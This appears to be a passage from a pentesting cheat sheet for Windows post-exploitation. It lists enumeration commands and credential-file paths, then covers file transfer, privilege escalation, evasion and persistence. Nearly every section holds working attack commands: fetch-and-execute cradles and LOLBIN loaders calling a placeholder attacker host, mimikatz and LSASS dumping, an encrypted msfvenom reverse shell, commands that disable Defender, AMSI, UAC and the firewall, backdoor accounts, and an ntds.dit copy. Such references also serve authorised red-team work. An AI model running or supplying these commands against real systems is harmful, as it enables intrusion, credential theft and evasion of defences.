        ~> wmic.exe process list

    `` Scheduled Tasks

        ~> schtasks.exe /query /fo LIST /v
        ~> schtasks.exe /query /fo LIST 2>nul | findstr.exe "VAR_STRING"

    `` Logging

        ~> reg.exe query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit
        ~> reg.exe query HKLM\Software\Policies\Microsoft\Windows\EventLog\EventForwarding\SubscriptionManager
        ~> reg.exe query HKLM\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
        ~> reg.exe query HKLM\Software\Policies\Microsoft\Windows\PowerShell\Transcription
        ~> wevtutil el

    `` AppLocker

        ~PS> (Get-AppLockerPolicy -Local).RuleCollections
        ~PS> Get-ChildItem -Path HKLM:Software\Policies\Microsoft\Windows\SrpV2 -Recurse
        ~> reg.exe query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\SrpV2\Exe\

    `` Interesting files

        - %SYSTEMROOT%\System32\$winnt$.inf
        - %SYSTEMROOT%\Panther\Unattend.xml
        - %SYSTEMROOT%\Panther\Unattend\Unattend.xml
        - %SYSTEMROOT%\system32\sysprep.inf
        - %SYSTEMROOT%\system32\sysprep\sysprep.xml
        - %SYSTEMROOT%\ntds
        - %SYSTEMROOT%\System32\GroupPolicy\Machine
        - %SYSTEMROOT%\System32\GroupPolicy\User
        - %SYSTEMROOT%\System32\GroupPolicyUsers
        - %SYSTEMDRIVE%\pagefile.sys
        - %SYSTEMROOT%\debug\NetSetup.log
        - %SYSTEMROOT%\iis6.log
        - %SYSTEMROOT%\iis7.log
        - %SYSTEMROOT%\iis8.log
        - %SYSTEMROOT%\Panther\Unattend.txt
        - %SYSTEMROOT%\php.ini
        - %SYSTEMROOT%\repair\SAM
        - %SYSTEMROOT%\repair\security
        - %SYSTEMROOT%\repair\software
        - %SYSTEMROOT%\repair\system
        - %SYSTEMROOT%\system32\CCM\logs\*.log
        - %SYSTEMROOT%\system32\config\AppEvent.Evt
        - %SYSTEMROOT%\system32\config\default.sav
        - %SYSTEMROOT%\system32\config\regback\default
        - %SYSTEMROOT%\System32\config\RegBack\SAM
        - %SYSTEMROOT%\System32\config\RegBack\system
        - %SYSTEMROOT%\system32\config\regback\security
        - %SYSTEMROOT%\system32\config\regback\software
        - %SYSTEMROOT%\System32\config\SAM
        - %SYSTEMROOT%\system32\config\SecEvent.Evt
        - %SYSTEMROOT%\system32\config\security.sav
        - %SYSTEMROOT%\system32\config\software.sav
        - %SYSTEMROOT%\System32\config\SYSTEM
        - %SYSTEMROOT%\system32\config\system.sav
        - %SYSTEMROOT%\System32\drivers\etc\hosts
        - %SYSTEMROOT%\System32\drivers\etc\networks
        - %SYSTEMROOT%\system32\inetsrv\config\applicationHost.config
        - %SYSTEMROOT%\system32\inetsrv\config\schema\ASPNET_schema.xml
        - %SYSTEMROOT%\system32\logfiles\httperr\httperr1.log
        - %SYSTEMROOT%\system32\sysprep
        - %SYSTEMROOT%\win.ini
        - %SYSTEMROOT%\windowsupdate.log
        - %USERPROFILE%\ntuser.dat
        - %USERPROFILE%\Application Data\Microsoft\Credentials\
        - %SYSTEMDRIVE%\apache\logs\access.log
        - %SYSTEMDRIVE%\apache\logs\error.log
        - %SYSTEMDRIVE%\apache\php\php.ini
        - %SYSTEMDRIVE%\Autounattend.xml
        - %SYSTEMDRIVE%\boot.ini
        - %SYSTEMDRIVE%\Documents and Settings\Administrator\desktop\desktop.ini
        - %SYSTEMDRIVE%\Documents and Settings\Administrator\NTUser.dat
        - %SYSTEMDRIVE%\Documents and Settings\Administrator\ntuser.ini
        - %SYSTEMDRIVE%\inetpub\logs\LogFiles\
        - %SYSTEMDRIVE%\inetpub\wwwroot\
        - %SYSTEMDRIVE%\inetpub\wwwroot\global.asa
        - %SYSTEMDRIVE%\inetpub\wwwroot\web.config
        - %SYSTEMDRIVE%\MySQL\data\hostname.err
        - %SYSTEMDRIVE%\MySQL\data\mysql.err
        - %SYSTEMDRIVE%\MySQL\data\mysql.log
        - %SYSTEMDRIVE%\MySQL\my.cnf
        - %SYSTEMDRIVE%\MySQL\my.ini
        - %SYSTEMDRIVE%\php4\php.ini
        - %SYSTEMDRIVE%\php5\php.ini
        - %SYSTEMDRIVE%\php\php.ini
        - %SYSTEMDRIVE%\Program Files (x86)\Apache Group\Apache2\conf\httpd.conf
        - %SYSTEMDRIVE%\Program Files (x86)\Apache Group\Apache\conf\access.log
        - %SYSTEMDRIVE%\Program Files (x86)\Apache Group\Apache\conf\error.log
        - %SYSTEMDRIVE%\Program Files (x86)\Apache Group\Apache\conf\httpd.conf
        - %SYSTEMDRIVE%\Program Files (x86)\FileZilla Server\FileZilla Server.xml
        - %SYSTEMDRIVE%\Program Files (x86)\xampp\apache\conf\httpd.conf
        - %SYSTEMDRIVE%\Program Files\Apache Group\Apache2\conf\httpd.conf
        - %SYSTEMDRIVE%\Program Files\Apache Group\Apache\conf\httpd.conf
        - %SYSTEMDRIVE%\Program Files\Apache Group\Apache\logs\access.log
        - %SYSTEMDRIVE%\Program Files\Apache Group\Apache\logs\error.log
        - %SYSTEMDRIVE%\Program Files\FileZilla Server\FileZilla Server.xml
        - %SYSTEMDRIVE%\Program Files\MySQL\data\hostname.err
        - %SYSTEMDRIVE%\Program Files\MySQL\data\mysql-bin.log
        - %SYSTEMDRIVE%\Program Files\MySQL\data\mysql.err
        - %SYSTEMDRIVE%\Program Files\MySQL\data\mysql.log
        - %SYSTEMDRIVE%\Program Files\MySQL\my.cnf
        - %SYSTEMDRIVE%\Program Files\MySQL\my.ini
        - %SYSTEMDRIVE%\Program Files\MySQL\MySQL Server 5.0\data\hostname.err
        - %SYSTEMDRIVE%\Program Files\MySQL\MySQL Server 5.0\data\mysql-bin.log
        - %SYSTEMDRIVE%\Program Files\MySQL\MySQL Server 5.0\data\mysql.err
        - %SYSTEMDRIVE%\Program Files\MySQL\MySQL Server 5.0\data\mysql.log
        - %SYSTEMDRIVE%\Program Files\MySQL\MySQL Server 5.0\my.cnf
        - %SYSTEMDRIVE%\Program Files\MySQL\MySQL Server 5.0\my.ini
        - %SYSTEMDRIVE%\Program Files\MySQL\MySQL Server 5.1\my.ini
        - %SYSTEMDRIVE%\sysprep.inf
        - %SYSTEMDRIVE%\sysprep\sysprep.inf
        - %SYSTEMDRIVE%\sysprep\sysprep.xml
        - %SYSTEMDRIVE%\Unattend.xml
        - %SYSTEMDRIVE%\Users\Administrator\Desktop\desktop.ini
        - %SYSTEMDRIVE%\Users\Administrator\NTUser.dat
        - %SYSTEMDRIVE%\Users\Administrator\NTUser.ini
        - %SYSTEMDRIVE%\xampp\apache\bin\php.ini
        - %SYSTEMDRIVE%\xampp\apache\conf\httpd.conf
        - %SYSTEMDRIVE%\xampp\apache\logs\access.log
        - %SYSTEMDRIVE%\xampp\apache\logs\error.log
        - %SYSTEMDRIVE%\xampp\security\webdav.htpasswd
        - %SYSTEMDRIVE%\xampp\tomcat\conf\tomcat-users.xml
        - %SYSTEMDRIVE%\xampp\tomcat\conf\web.xml
        - %SYSTEMDRIVE%\xampp\webalizer\webalizer.conf
        - %SYSTEMDRIVE%\xampp\webdav\webdav.txt
        - %APPDATA%\Microsoft\Credentials
        - %APPDATA%\Microsoft\Protect
        - *.gpg
        - *.pgp
        - *.p12
        - *.der
        - *.csr
        - *.cer
        - *.ovpn
        - *.kdbx

    `` Registry keys

        - HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
        - HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
        - HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserInit
        - HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
        - HKLM\Software\Microsoft\Windows\CurrentVersion\Run
        - HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
        - HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
        - HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
        - HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
        - HKLM\System\CurrentControlSet\Control\Session Manager\BootExecute
        - HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
        - HKCU\Software\Microsoft\Windows\CurrentVersion\Run
        - HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
        - HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices
        - HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce (legacy Windows)

        ~> reg.exe query HKLM /f password /t REG_SZ /s

    `` Weak Permissions

        `` Filesystem

            ~> icacls "C:\Documents and Settings\*" 2>nul | findstr.exe "(F) (M)" | findstr.exe "Everyone BUILTIN\Users"
            ~> icacls "C:\Program Files (x86)\*" 2>nul | findstr.exe "(F) (M)" | findstr.exe "Everyone BUILTIN\Users"
            ~> icacls "C:\Program Files\*" 2>nul | findstr.exe "(F) (M)" | findstr.exe "Everyone BUILTIN\Users"
            ~> icacls "C:\Users\*" 2>nul | findstr.exe "(F) (M)" | findstr.exe "Everyone BUILTIN\Users"
            ~> icacls "C:\*." /findsid VAR_USERNAME /t /c /l 2>nul

            -- Files

            ~> accesschk.exe -uwvs "Authenticated Users" c:\
            ~> accesschk.exe -uwvs "Everyone" c:\
            ~> accesschk.exe -uwvs "Users" c:\

            -- Directories

            ~> accesschk.exe -duwvs "Authenticated Users" c:\
            ~> accesschk.exe -duwvs "Everyone" c:\
            ~> accesschk.exe -duwvs "Users" c:\

        `` Registry

            ~> accesschk.exe -kuwvs "Authenticated Users" "HKLM\SYSTEM\CurrentControlSet\Services"
            ~> accesschk.exe -kuwvs "Everyone" "HKLM\SYSTEM\CurrentControlSet\Services"
            ~> accesschk.exe -kuwvs "Users" "HKLM\SYSTEM\CurrentControlSet\Services"

        `` With PowerShell

            ~PS> Get-ChildItem -Recurse | Get-Acl | out-string -stream | select-string -pattern "Everyone"

    `` Sensitive data

        ~> dir /S /B *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul
        ~> dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config* 2>nul
        ~> dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config* 2>nul
        ~> cd C:\ && findstr.exe /SI /M password *.xml *.ini *.txt *.config *.cfg 2>nul
        ~PS> Get-Childitem -Path C:\Users\ -Include *pass*,*cred*,*vnc*,*.config -File -Recurse -ErrorAction SilentlyContinue
        ~PS> Get-ChildItem C:\* -include *.xml,*.ini,*.txt,*.config -Recurse -ErrorAction SilentlyContinue | Select-String -Pattern "password"

`` File transfer

    `` BitsAdmin

        ~> cmd.exe /c "bitsadmin /transfer myjob /download /priority high http://VAR_ATTACKER_HOST/accesschk.exe accesschk.exe"

        ~PS> Import-Module BitsTransfer
        ~PS> Start-BitsTransfer -Source $url -Destination $output

    `` certutil

        ~> certutil.exe -urlcache -split -f "http://VAR_ATTACKER_HOST/file.b64" & certutil.exe -f -decode Blob0_0.bin accesschk.exe & del Blob0_0.bin
        ~> certutil.exe -urlcache -split -f "http://VAR_ATTACKER_HOST/file.b64" & certutil.exe -f -decode accesschk.b64 accesschk.exe & del accesschk.b64

    `` Non-interactive FTP

        `` Script

            @ snippets/windows/utils/ftp.bat

    `` Powershell

        `` Script

            @ snippets/windows/utils/wget_ps1.bat

        `` CLI

            ~> powershell.exe Invoke-WebRequest -Uri http://VAR_ATTACKER_HOST/nc.exe -OutFile C:\nc.exe
            ~> powershell.exe -c "(new-object System.Net.WebClient).DownloadFile('http://VAR_ATTACKER_HOST/file.exe','C:\Users\user\Desktop\file.exe')"
            ~PS> $h=New-Object -com Msxml2.XMLHTTP;$h.open('GET','http://VAR_ATTACKER_HOST/script.ps1',$false);$h.send();iex $h.responseText
            ~PS> $h=New-Object -com WinHttp.WinHttpRequest.5.1;$h.open('GET','http://VAR_ATTACKER_HOST/script.ps1',$false);$h.send();iex $h.responseText
            ~PS> $h=New-Object Net.HttpListener;$h.Prefixes.Add("http://+:8000/");$h.Start();While ($h.IsListening){$HC=$h.GetContext();$HRes=$HC.Response;$HRes.Headers.Add("Content-Type","text/plain");$Buf=[Text.Encoding]::UTF8.GetBytes((GC (Join-Path $Pwd ($HC.Request).RawUrl)));$HRes.ContentLength64=$Buf.Length;$HRes.OutputStream.Write($Buf,0,$Buf.Length);$HRes.Close()};$h.Stop()
            ~PS> $ie=New-Object -com InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://VAR_ATTACKER_HOST/script.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
            ~PS> IEX (iwr 'http://VAR_ATTACKER_HOST/script.ps1')
            ~PS> IEX (New-Object Net.Webclient).downloadstring("http://VAR_ATTACKER_HOST/script.ps1")
            ~PS> Import-Module bitstransfer;Start-BitsTransfer 'http://VAR_ATTACKER_HOST/script.ps1' $env:temp\t;$r=gc $env:temp\t;rm $env:temp\t; iex $r

        `` DNS

            ~PS> IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(((nslookup -querytype=txt "SERVER" | Select -Pattern '"*"') -split '"'[0]))))

        `` Base64

            ~$ cat cmd.txt | iconv -t UTF-16LE -f UTF-8 | base64 -w0
            ~> powershell.exe -NoP -NonI -W Hidden -Exec Bypass -enc "JABjAGwAaQBlAG4AdAAgA...UAKAApAAoA"

    `` VBS

        `` Script

            @ snippets/windows/utils/wget_vbs.bat

    `` Powershell listener

        @ snippets/windows/shells/bind/PortListener.ps1

    `` Base64 encoder VBS

        @ snippets/windows/utils/base64.vbs

`` Privilege escalation

    `` Ideas

        - Access to sensitive files such as the Windows SAM file
        - Always Install Elevated
        - Autologon User Credential
        - DLL Hijacking / Proxying
        - DLL Injection
        - Group Policy Preferences
        - Insecure File/Folder Permissions
        - Insecure Named Pipes Permissions
        - Insecure Registry Permissions
        - Insecure Service Permissions
        - Installation scripts and data containing passwords
        - Registry settings such as always elevated and automatically executed binaries
        - Scheduled tasks that execute scripts and programs
        - Stored Credentials
        - Token Manipulation
        - Unattended Answer File
        - Unquoted Service Path
        - User Account Control (UAC) Bypass
        - Vulnerable software running with high privileges
        - Windows Kernel Exploit

    `` Automated

        `` Powershell

            - PowerUp.ps1 (https://github.com/PowerShellEmpire/PowerTools)
            - jaws-enum.ps1 (https://github.com/411Hall/JAWS)
            - HostRecon.ps1 (https://github.com/dafthack/HostRecon)

        `` Copy & Paste

            ~PS> (New-Object System.Net.WebClient).DownloadString('http://VAR_ATTACKER_HOST/PowerUp.ps1') | IEX; Invoke-AllChecks
            ~PS> (New-Object System.Net.WebClient).DownloadString('http://VAR_ATTACKER_HOST/jaws-enum.ps1') | IEX
            ~PS> (New-Object System.Net.WebClient).DownloadString('http://VAR_ATTACKER_HOST/HostRecon.ps1'); Invoke-HostRecon

        `` Metasploit

            ~MS> use post/multi/recon/local_exploit_suggester

    `` Services

        `` Weak Permissions

            ~> accesschk.exe -uwvc "Authenticated Users" *
            ~> accesschk.exe -uwvc "Everyone" *

        `` Bruteforcing

            ~PS> $services = ls HKLM:\SYSTEM\CurrentControlset\Services
            ~PS> foreach ($service in $services) {
            ~PS>     reg.exe add $service.Name /v ImagePath /t REG_EXPAND_SZ /d "C:\Windows\Temp\test.bat" /f
            ~PS>     Start-Service -name $service.Name.Split("\\")[-1] 
            ~PS> }

        `` Configuration

            ~> sc.exe qc upnphost
            ~> sc.exe config upnphost binpath= "net user VAR_USERNAME VAR_PASSWORD /add && net localgroup Administrators VAR_USERNAME /add" type= interact
            ~> sc.exe config upnphost obj= ".\LocalSystem" password= ""
            ~> net.exe stop upnphost
            ~> net.exe start upnphost

        ~PS> Get-Service -name "VAR_STRING*" | Set-Service -StartupType "disabled"
        ~PS> Stop-Process -force -name VAR_STRING*

    `` Finding C# compiler

        ~> dir /s %WINDIR%\csc.exe

    `` mimikatz

        ~> mimikatz "privilege::debug" "sekurlsa::logonPasswords" exit
        ~> mimikatz "privilege::debug" "token::elevate" "sekurlsa::logonPasswords" exit
        ~> mimikatz "privilege::debug" "token::elevate" "sekurlsa::logonPasswords" "lsadump::lsa" "lsadump::trust" exit
        ~> mimikatz "privilege::debug" "token::elevate /domainadmin" exit
        token::run cmd.exe
        sekurlsa::pth /user:VAR_USERNAME /domain:VAR_DOMAIN /ntlm:VAR_NT_HASH /run:cmd
        ~PS> Invoke-Mimikatz -Command '"privilege::debug sekurlsa::logonPasswords"'
        ~PS> Invoke-Mimikatz -Command '"privilege::debug dbapi::cred /in:VAR_STRING"'

        `` With SharpSploit

            ~> SharpSploitConsole.exe Mimi-Command "!+"
            ~> SharpSploitConsole.exe Mimi-Command "!processprotect /process:lsass.exe /remove"
            ~> SharpSploitConsole.exe Mimi-All

        `` Dump with SysInternals procdump.exe and load the dump offline into mimikatz

            ~> procdump.exe -ma lsass.exe lsass.dmp -accepteula
            ~> mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit

        `` Dump with native DLL

            ~> tasklist.exe /fi "imagename eq lsass.exe"
            ~> C:\Windows\system32\rundll32.exe C:\Windows\system32\comsvcs.dll, MiniDump VAR_STRING_PID %TEMP%\lsass.dmp full

    `` Run shell as NT AUTHORITY\SYSTEM

        ~> psexec.exe -h -i -s %SYSTEMROOT%\system32\cmd.exe -accepteula

`` Evasion

    `` AppLocker-free paths

        - applocker-bypas-checker.ps1 (https://github.com/HackLikeAPornstar/GibsonBird/blob/master/chapter4/applocker-bypas-checker.ps1)

    `` LOLBINs

        ~> cmd.exe /k < \\VAR_ATTACKER_HOST\folder\batchfile.txt
        ~> cscript //E:jscript \\VAR_ATTACKER_HOST\folder\payload.txt
        ~> mshta vbscript:Close(Execute("GetObject(""script:http://VAR_ATTACKER_HOST/payload.sct"")"))
        ~> mshta http://VAR_ATTACKER_HOST/payload.hta
        ~> mshta \\VAR_ATTACKER_HOST\folder\payload.hta
        ~> rundll32.exe \\VAR_ATTACKER_HOST\folder\payload.dll,entrypoint
        ~> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://VAR_ATTACKER_HOST/payload.sct");window.close();
        ~> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.Exec(\"calc\")");
        ~> wmic.exe os get /format:"https://VAR_ATTACKER_HOST/payload.xsl"
        ~> C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\VAR_ATTACKER_HOST\folder\payload.dll
        ~> regsvr32 /u /n /s /i:http://VAR_ATTACKER_HOST/payload.sct scrobj.dll
        ~> regsvr32 /u /n /s /i:\\VAR_ATTACKER_HOST\folder\payload.sct scrobj.dll
        ~> odbcconf /s /a {regsvr \\VAR_ATTACKER_HOST\folder\payload_dll.txt}
        ~> cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\VAR_ATTACKER_HOST\folder\payload.xml > payload.xml & !MB! payload.xml"
        ~> certutil -urlcache -split -f http://VAR_ATTACKER_HOST/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll
        ~> rundll32 c:\windows\system32\ieframe.dll,OpenURL 1.url

    `` AlwaysInstallElevated

        ~> reg.exe query "HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated"
        ~> reg.exe query "HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated"

    `` Disabling defense

        `` Is Credential Guard enabled?

            ~PS> Get-CimInstance -ClassName Win32_DeviceGuard -Namespace root\Microsoft\Windows\DeviceGuard

        `` Disabling Windows Defender

            ~> reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
            
            -- Disable real-time monitoring, cloud-delivered protection and automatic sample submission
            ~PS> Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disabled

            ~> sc.exe stop WinDefend

            ~PS> "C:\Program Files\Windows Defender\mpcmdrun.exe" -RemoveDefinitions -All Set-MpPreference -DisableIOAVProtection $true
            ~PS> Add-MpPreference -ExclusionPath C:\

        `` Invoke-Mimikatz "obfuscation"

            ~$ ~/lib/pentesting-cookbook/snippets/windows/utils/obfuscate-mimikatz.sh ./Invoke-Mimikatz.ps1 Invoke-Minidoggiez.ps1

        `` Invoke-Obfuscation

            ~PS> Invoke-Obfuscation -ScriptPath 'https://example.com/VAR_STRING.ps1' -Command 'TOKEN,ALL,1,OUT Invoke-Minidoggiez.ps1' -Quiet

        `` In-memory Mimikatz

            ~PS> $browser = New-Object System.Net.WebClient
            ~PS> $browser.Proxy.Credentials =[System.Net.CredentialCache]::DefaultNetworkCredentials
            ~PS> mimi= $browser.DownloadString("http://VAR_ATTACKER_HOST/Invoke-Minidoggiez.ps1")
            ~PS> Invoke-Expression(mimi)
            ~PS> Invoke-Minidoggiez

        `` Hyperion

            ~$ msfvenom -p windows/shell_reverse_tcp lhost=VAR_ATTACKER_HOST lport=VAR_ATTACKER_PORT -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o foobar.exe
            ~$ cp /usr/share/windows-binaries/Hyperion-1.0.zip .
            ~$ unzip Hyperion-1.0.zip
            ~$ cd Hyperion-1.0/
            ~$ Hyperion-1.0# i686-w64-mingw32-g++ Src/Crypter/*.cpp -o hyperion.exe
            ~$ Hyperion-1.0# cp -p /usr/lib/gcc/i686-w64-mingw32/6.1-win32/libgcc_s_sjlj-1.dll .
            ~$ Hyperion-1.0# cp -p /usr/lib/gcc/i686-w64-mingw32/6.1-win32/libstdc++-6.dll .
            ~$ Hyperion-1.0# wine hyperion.exe ../foobar.exe ../crypted.exe

        `` Disable AMSI

            ~PS> [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null,$true)
            ~PS> IEX(New-Object System.Net.WebClient).DownloadString('http://VAR_ATTACKER_HOST:8001/amsi-bypass.ps1')

        `` Is UAC enabled?

            ~> reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA

        `` Disable UAC (Vista, 7, 8, 10)

            ~> reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f

        `` UAC bypass by mounting system

            ~> net.exe use Z: \\127.0.0.1\c$
            ~> cd C$

    `` Reading files

        ~PS> .\Invoke-NinjaCopy.ps1 -Path "C:\Windows\System32\config\system" -LocalDestination c:\%TEMP\system.bak
        ~PS> .\Invoke-NinjaCopy.ps1 -Path "C:\Windows\System32\config\sam" -LocalDestination c:\%TEMP\sam.bak

    `` JScript Assembly

        [Reflection.Assembly]::LoadWithPartialName('Microsoft.JScript');$js = 'var js = new ActiveXObject("WScript.Shell");js.Run("calc");'[Microsoft.JScript.Eval]::JScriptEvaluate($js,[Microsoft.JScript.Vsa.VsaEngine]::CreateEngine());

    `` XML/XSL

        ~PS> $s=New-Object System.Xml.Xsl.XsltSettings;$r=New-Object System.Xml.XmlUrlResolver;$s.EnableScript=1;$x=New-Object System.Xml.Xsl.XslCompiledTransform;$x.Load('http://VAR_ATTACKER_HOST/xsl-notepad.xsl',$s,$r);$x.Transform('http://VAR_ATTACKER_HOST/xsl-notepad.xml','z');del z;

    `` SCT

        `` Powershell VBScript Assembly SCT "Fetch & Execute"

            ~PS> [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');[Microsoft.VisualBasic.Interaction]::GetObject('script:http://VAR_ATTACKER_HOST/notepad.sct').Exec(0)

        `` Powershell JScript Assembly SCT "Fetch & Execute"

            ~PS> [Reflection.Assembly]::LoadWithPartialName('Microsoft.JScript');[Microsoft.JScript.Eval]::JScriptEvaluate('GetObject("script:http://VAR_ATTACKER_HOST/notepad.sct").Exec()',[Microsoft.JScript.Vsa.VsaEngine]::CreateEngine())

    `` Loading .Net/C# Assemblies to Bypass AppLocker Default Rules w/ PowerShell Diagnostic Scripts

        ~> powershell.exe -v 2 -ep bypass
        ~PS> cd C:\windows\diagnostics\system\AERO
        ~PS> import-module .\CL_LoadAssembly.ps1
        ~PS> LoadAssemblyFromPath ..\..\..\..\path\assembly.exe
        ~PS> [name.space]::executesomething()

    `` Command Invocation w/ PowerShell Diagnostic Scripts

        ~> powershell.exe -v 2 -ep bypass
        ~PS> cd C:\windows\diagnostics\system\AERO
        ~PS> import-module CL_Invocation.ps1
        ~PS> SyncInvoke notepad.exe

    `` PowerShell CL Download Cradle

        ~PS> $a = New-Object System.Xml.XmlDocument
        ~PS> $a.Load("http://VAR_ATTACKER_HOST/notepad.xml")
        ~PS> $a.command.a.execute | iex

    `` Installing root certificate

        ~> certutil.exe -addstore -f -user Root %TEMP%\cert.cer
        ~PS> Import-Certificate -FilePath %TEMP%\cert.cer -CertStoreLocation Cert:\CurrentUser\Root\

    `` diskshadow.exe

        `` Interactive

            ~> c:\windows\system32\diskshadow.exe
            > exec calc.exe
            > exec "cmd.exe" /c calc.exe
            > exit

        `` Script (diskshadow.txt)

            set context persistent nowriters
            add volume c: alias someAlias
            create
            expose %someAlias% z:
            exec "cmd.exe" /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.dit
            exec "cmd.exe" /c reg.exe save hklm\system c:\exfil\system.bak
            delete shadows volume %someAlias%
            reset

        `` Execution

            ~> diskshadow.exe /s c:\test\diskshadow.txt

        `` Persistence

            ~> schtasks.exe /create /sc hourly /tn VSSTask /tr "diskshadow.exe /s c:\test\diskshadow.txt"

            ~> reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v VSSRun /t REG_EXPAND_SZ /d "diskshadow.exe /s c:\test\diskshadow.txt"

        `` Uninstall Windows patch

            ~> wusa /uninstall /kb:4498932 /quiet /norestart

`` Persistence

    `` Registry

        -- Screen saver
        ~> reg.exe add "HKCU\Control Panel\Desktop" /v SCRNSAVE.EXE /d c:\shell.cmd

        ~PS> New-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name PersistCalc -PropertyType String -Value "C:\Windows\System32\calc.exe"

    `` Accounts

        `` CLI

            ~> net.exe user VAR_USERNAME VAR_PASSWORD /add
            ~> net.exe localgroup administrators VAR_USERNAME /add
            ~> net.exe localgroup "Remote Desktop Users" VAR_USERNAME /add

        `` useradd.c

            @ snippets/windows/backdoors/useradd.c

    `` Services

        `` Use e.g. ServiceWrapper

            -- Executable must be wrapped as a Windows service
            ~> sc.exe create VAR_NAME binpath= "C:\Program Files\Intel\update.exe"

            -- Now allow all authenticated users to take control over the service using SDDL format, e.g.
            ~> sc.exe sdshow VAR_NAME
            D:(A;;CCLCSWLOCRRC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPWPDTLOCRRC;;;SY)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

            -- VAR_STRING must be the result from sc sdshow plus "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)" (allow all to authenticated users) (in the D: section, right before S:)
            ~> sc.exe sdset VAR_NAME VAR_STRING

        `` Launch command prompt on demand

            ~> sc.exe create VAR_NAME binpath= "cmd.exe /K start" type= own type= interact start= demand
            -- Add permissions as above

    `` Services

        ~> sc.exe \\VAR_TARGET_HOST create VAR_STRING binpath= "c:\Windows\Temp\foobar.exe"
        ~> sc.exe \\VAR_TARGET_HOST start VAR_STRING
        ~> sc.exe \\VAR_TARGET_HOST delete VAR_STRING

    `` Registry

        `` The command runs every time any user logs in, in the context of that user

            ~> reg.exe add "\\VAR_TARGET_HOST\HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "VAR_STRING" /t REG_SZ /d "VAR_STRING"

        `` Query the remote registry

            ~> reg.exe query "\\VAR_TARGET_HOST\HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "VAR_STRING"

        `` Delete the remote registry

            ~> reg.exe delete "\\VAR_TARGET_HOST\HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "VAR_STRING"

    `` Startup

        `` Executes every time a user logs in

            ~> xcopy foobar.exe "\\VAR_TARGET_HOST\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\launcher.bat"

    `` Scheduler

        `` Create new task and execute it

            ~> schtasks.exe /create /tn VAR_STRING /tr c:\windows\temp\foobar.exe /sc once /st 00:00 /S VAR_TARGET_HOST /RU System
            ~> schtasks.exe /run /tn VAR_STRING /S VAR_TARGET_HOST

            ~> schtasks.exe /create /sc minute /mo 10 /tn VAR_STRING /tr c:\windows\temp\foobar.exe

        `` Delete the task after it is executed

            ~> schtasks.exe /F /delete /tn VAR_STRING /S VAR_TARGET_HOST

    `` Windows Firewall

        `` Stop service
        ~> net.exe stop MspSvc

        ~> netsh.exe advfirewall set allprofiles state off
        ~> netsh.exe advfirewall show allprofiles
        ~> netsh.exe firewall set opmode disable

    `` RDP

        ~> net.exe start TermService
        ~> netsh.exe add portopening TCP 3389 "Remote Desktop"
        ~> netsh.exe firewall set service RemoteAdmin enable
        ~> netsh.exe firewall set service RemoteDesktop enable
        ~> sc.exe config TermService start= auto

        ~> reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 1 /f
        ~> reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
